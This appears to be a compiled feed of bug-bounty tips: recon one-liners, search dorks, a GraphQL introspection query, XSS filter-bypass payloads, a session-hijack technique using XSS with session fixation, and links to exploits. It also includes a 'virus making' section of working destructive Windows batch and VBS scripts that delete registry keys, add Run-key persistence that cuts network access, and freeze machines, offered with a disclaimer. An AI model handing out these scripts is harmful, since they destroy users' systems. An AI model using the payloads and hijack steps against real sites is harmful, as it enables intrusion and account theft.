Bug bounty Tips

Bug Bounty Hunting — Complete Guide (Part-5): https://medium.com/@rafid19/bug-bounty-hunting-complete-guide-part-5-efb95db2210b?source=rss------bug_bounty-5

Bug Bounty Hunting — Complete Guide (Part -4): https://medium.com/@rafid19/bug-bounty-hunting-complete-guide-part-4-00e815fa8026?source=rss------bug_bounty-5

Subdomains Enumeration: Tools, Techniques, and Tips: https://medium.com/@Kaizen2977/subdomains-enumeration-tools-techniques-and-tips-4d43ea31dc0f?source=rss------bug_bounty-5

Bug Bounty Tip XSS WAF Bypass by multi-char HTML entities fj translates to fj >⃒ translates to > + [?] <⃒ translates to < + [?] [?] - Unicode symbol Cheers!

- (function(x){this[x+`ert`](1)})`al` - window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2) - document['default'+'View'][`\u0061lert`](3) #XSS

60 BugBounty Dorks inurl:responsible-disclosure-policy inurl:/security ext:txt "contact" 0. inurl: responsible disclosure $1,000 1. site:.example.com inurl:security filetype:pdf 2. site:example.com intext:security intitle:report 3. intext:”bug bounty” site:example.com ext:doc 4. intitle:”bug bounty” site:example.com inurl:docs 5. site:example.com intext:”security policy” 6. site:example.com inurl:bug bounty ext:csv 7. site:example.com intext:disclosure inurl:policy 8. site:example.com intext:reward program intitle:”vulnerability” 9. site:example.com inurl:security intext:”reward” ext:xml 10. site:example.com intitle:”responsible disclosure” intext:reward -site:hackerone -site:bugcrowd 11. intext:”bug bounty” site:example.com inurl:archives 12. site:example.com intext:security ext:log 13. site:example.com inurl:disclosure ext:php 14. site:example.com intitle:”white hat program” 15. site:example.com inurl:security ext:json 16. site:example.com intext:”vulnerability report” intitle:”submit” 17. intext:”bug bounty” site:example.com intitle:”report” 18. site:example.com inurl:vulnerability intext:program filetype:json 19. site:example.com intext:responsible disclosure intitle:acknowledgement 20. site:example.com intext:”security concern” ext:html -inurl:blog 21. site:example.com inurl:bug inurl:bounty 22. site:example.com inurl:security intext:bounty 23. site:example.com inurl:security ext:txt 24. site:example.com inurl:responsible-disclosure 25. site:example.com inurl:/.well-known/security 26. site:example.com intext:bug bounty program 27. site:example.com intext:responsible disclosure program 28. site:example.com intext:vulnerability disclosure program 29. site:example.com intext:security rewards 30. site:example.com intext:bug bounty payout 31. site:example.com inurl:security ext:txt -inurl:hackerone -inurl:bugcrowd -inurl:synack 32. site:example.com inurl:responsible-disclosure -inurl:hackerone -inurl:bugcrowd -inurl:synack 33. site:example.com intext:bug bounty -inurl:hackerone -inurl:bugcrowd -inurl:synack 34. inurl:/security 35. inurl:/responsible-disclosure/ swag 36. inurl:’/responsible disclosure’ hoodie 37. responsible disclosure hall of fame 38. inurl:responsible disclosure $50 39. responsible disclosure europe 40. responsible disclosure white hat 41. white hat program 42. responsible disclosure r=h:nl 43. responsible disclosure r=h:uk 44. responsible disclosure r=h:eu 45. responsible disclosure bounty r=h:nl 46. responsible disclosure bounty r=h:uk 47. responsible disclosure bounty r=h:eu 48. responsible disclosure swag r=h:nl 49. responsible disclosure swag r=h:uk 50. responsible disclosure swag r=h:eu 51. responsible disclosure reward r=h:nl 52. responsible disclosure reward r=h:uk 53. responsible disclosure reward r=h:eu 54. “powered by bugcrowd” -site:bugcrowd.com 55. “submit vulnerability report” 56. “submit vulnerability report” | “powered by bugcrowd” | “powered by hackerone” 57. intext:”we take security very seriously” 58. site:responsibledisclosure.com 59. inurl:’vulnerability-disclosure-policy’ reward 60. site:..nl intext: security report reward

95% from hunters remove pics from endpoint, but... 1. Gathering all target endpoints 2. Filter the results just for pic extensions

cat endpoints.txt | egrep 'jpg|jpeg|png' > results.txt

3. Filter to live

httpx -l results.txt -mc 200 -o alive.txt

4. Found a passport on specific endpoint => app.com/xxxx/cdn/file/xxx.jpg 5. Visit app.com/xxxx/cdn/ ==> dir listing open and the results is tons of PII 💡Don't forget checking (jpg/jpeg/etc..) all the time by @GodfatherOrwa #bugbountytips

Mass hunting exposed git with hednsextractor: Tools: hednsextractor + httpx + DotGit Plugin

hednsextractor -target "target" -silent | httpx -path /.git/config -mc 200 -silent

#bugbountytips

🐛💰 Bug Bounty Tips: Unlocking GraphQL's Hidden Potential 🌐 When it comes to GraphQL, it's easy to assume that all operations are accessible through a target app's functionality. But by limiting your research, you might miss out on valuable opportunities. 😎 Today, I'll share steps to expand your attack surface on GraphQL target apps, gaining a competitive advantage in finding and reporting security issues! 1️⃣ Identifying GraphQL Targets: Start by identifying GraphQL targets using the powerful Nuclei Scanning: nuclei -u target.com -t graphql-detect.yaml 2️⃣ Retrieve the GraphQL Schema for hidden Query/Mutations: If Introspection is enabled, you can obtain the GraphQL Schema, revealing hidden GraphQL Operations and Mutations using the following GraphQL Query:

{"query":"{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}

3️⃣ Visualize with GraphQL Voyager: To visualize the GraphQL Schema effectively and craft your attack vector, use GraphQL Voyager - a powerful tool to help you navigate the schema: graphql-voyager 4️⃣ Retrieve Hidden Queries and Mutations: Retrieve GraphQL Queries and Mutations from JavaScript files when Introspection is disabled. These files may list hidden methods not accessible via the app's regular functionality. Try making direct requests to these. 5️⃣ Craft Your Attack: Craft your attack using the identified GraphQL Queries and Mutations with Inql scanner. These methods are often vulnerable to various bug classes, including IDOR, RBAC, Race Condition, SQL, and more. If you can't find more GraphQL Queries and Mutations, don't worry! Stay tuned for upcoming insights on how to brute force and discover hidden ones. 🔐 Takeaways: Don't hit a dead end with GraphQL apps. Dive deeper, find those concealed GraphQL Queries and Mutations, and unlock unimaginable functionalities that can lead to significant bounties! #bugbountytips #graphql

#exploit 1. CVE-2024-28397: js2py sandbox escape, bypass pyimport restriction https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape 2. Bringing process injection into view(s): exploiting all macOS apps using nib files https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files 3. CVE-2024-37079, CVE-2024-37080, CVE-2024-37081: VMware vCenter Server heap-overflow (RCE) https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a

CVE-2024-28995: High-Severity Directory Traversal Vulnerability affecting SolarWinds Serv-U. SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine. POC: https://github.com/rapid7/metasploit-framework/pull/19255 Query:

Hunter: protocol.banner="Serv-U FTP"
FOFA: app="SolarWinds-Serv-U-FTP"
SHODAN: product:"Serv-U ftpd"

🦠Top Virus Making Commands From Notepad🦠 🟣1. Disable Internet Permanently :- echo @echo off>c:windowswimn32.bat echo break off>c:windowswimn32.bat echo ipconfig/release_all>c:windowswimn32.bat echo end>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED! PAUSE 🃏Action :- This code will disable the internet connectivity permanently. 🟣2. Delete Key Registry Files :- @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your PC has been crashed.Your Dad. GOTO MESSAGE 🃏Action :- This will delete key registry files, then loops a message This is dangerous and unrecoverable Notepad Virus. 🟣3.Endless Notepads :- @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top 🃏Action :- This will pop up endless notepads until the computer freezes and crashes 🟣4. Popping Cd Drive :- Set oWMP = CreateObject(”WMPlayer.OCX.7″) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 100 loop 🃏Action :- This will make the CD drives constantly pop out 🟣 5. Endless Enter :- Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop 🃏Action :- This will make the enter button pressed continuously 🔰Save All With Extension . bat ⚠️Note :- I am Not Responsible For Any Damaged Of Your Computer Want 50 reaction in this post family 🫂

Guys, please tell me your thoughts on this I am planning to start a video explanation on BugBounty hunting so what are thing I need to change and all please let me know guys

Guys check this out, a book summary app where you guys can start reading at your free time, I loved this app and I hope you guys also love this if yes give a reactions https://dsta.sh/mnA6TcBrYYingNzm7

Bug Bounty Hint How to Perform Session Hijack with XSS + Session Fixation When the Session Cookie is HttpOnly Steps: 1) Create a session cookie with an unauthenticated session value on the /login path using JavaScript. 2) Force the user to log out. 3) When the user logs back in, they will use the unauthenticated session. Details: The attacker creates a session cookie on another browser, then injects that session into the victim's account by overriding the existing HttpOnly cookie with a similar cookie name but a different value on a different path. sess=aaaa; path=/login; expires=Fri, 17 Jun 2024 10:00:00 When the login form is submitted, it will contain two cookies. The one created with JavaScript on the /login path will be first, followed by the HttpOnly cookie on the different path /. Cookie: sess=aaaa; sess=bbbb; Since the website has a Session Fixation bug, no new session will be generated when the user logs in. Because there are two session cookies, only the first one from the attacker (sess=aaaa) will be used, and the logged-in user will be attached to it. The final step is to use the unauthenticated session that was previously created on the attacker's browser for all website actions from the attacker's side. Cheers!

Arjun + KXSS Finding - Parameter - XSS arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss #bugbountytips #bugbounty